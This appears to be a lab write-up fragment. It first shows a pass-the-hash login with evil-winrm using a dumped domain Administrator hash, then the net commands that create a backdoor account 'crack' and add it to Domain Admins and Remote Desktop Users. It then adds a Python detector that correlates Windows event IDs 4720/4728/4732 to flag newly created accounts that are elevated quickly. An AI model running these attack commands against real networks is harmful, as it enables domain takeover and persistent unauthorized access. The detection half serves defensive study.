Obtain the domain administrator's hash from 151:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48989de6a73f952ad51adceabc13cc9c:::
proxychains4 evil-winrm -u tricky.com\\\\administrator -H 48989de6a73f952ad51adceabc13cc9c -i 172.16.64.150
Add a user, then add it to the Domain Admins group and the Remote Desktop Users group.
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **net user crack Passw0rd! /add /domain**
[proxychains] Strict chain ... 127.0.0.1:1088 ... 172.16.64.150:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1088 ... 172.16.64.150:5985 ... OK
The command completed successfully.
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **net localgroup "Remote Desktop Users" crack /add /domain**
[proxychains] Strict chain ... 127.0.0.1:1088 ... 172.16.64.150:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1088 ... 172.16.64.150:5985 ... OK
The command completed successfully.
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> **net group "domain admins" crack /add /domain**
The command completed successfully.
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop>
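
On the domain controller, the sequence above shows up in the Security log as an account creation (event 4720) followed within seconds by additions to privileged groups (4728 for a global group such as Domain Admins, 4732 for a local group such as Remote Desktop Users). The following is an added example, not part of the original write-up, that correlates those events; the records are constructed and their field names (`actor`, `target`, `member`, `group`) are simplified assumptions rather than the raw event schema.

```python
from datetime import datetime, timedelta

# Windows Security event IDs: 4720 = user account created;
# 4728 / 4732 / 4756 = member added to a security-enabled
# global / local / universal group.
ACCOUNT_CREATED = 4720
MEMBER_ADDED = {4728, 4732, 4756}
WATCHED_GROUPS = {"domain admins", "enterprise admins",
                  "administrators", "remote desktop users"}

# Constructed sample records; field names are simplified assumptions.
EVENTS = [
    {"time": "2024-01-01T09:00:00", "id": 4720, "actor": "helpdesk", "target": "jsmith"},
    {"time": "2024-01-01T09:01:00", "id": 4728, "actor": "helpdesk", "member": "jsmith", "group": "Sales"},
    {"time": "2024-01-01T10:00:05", "id": 4720, "actor": "Administrator", "target": "crack"},
    {"time": "2024-01-01T10:00:20", "id": 4732, "actor": "Administrator", "member": "crack", "group": "Remote Desktop Users"},
    {"time": "2024-01-01T10:00:41", "id": 4728, "actor": "Administrator", "member": "crack", "group": "Domain Admins"},
    {"time": "2024-01-01T16:30:00", "id": 4728, "actor": "helpdesk", "member": "jsmith", "group": "Domain Admins"},
]


def find_fresh_privileged_accounts(events, window=timedelta(minutes=10)):
    """Return {account: [groups]} for accounts that were created and then
    added to a watched group within `window` of their creation."""
    created = {}   # lower-cased account name -> creation time
    alerts = {}
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["time"])):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == ACCOUNT_CREATED:
            created[ev["target"].lower()] = when
        elif ev["id"] in MEMBER_ADDED and ev["group"].lower() in WATCHED_GROUPS:
            born = created.get(ev["member"].lower())
            if born is not None and when - born <= window:
                alerts.setdefault(ev["member"], []).append(ev["group"])
    return alerts


if __name__ == "__main__":
    for account, groups in find_fresh_privileged_accounts(EVENTS).items():
        print(f"ALERT: new account {account!r} added to {groups}")
```

Any addition to Domain Admins deserves review on its own; this correlation is the narrower, higher-confidence signal for an account that is created and elevated in one session.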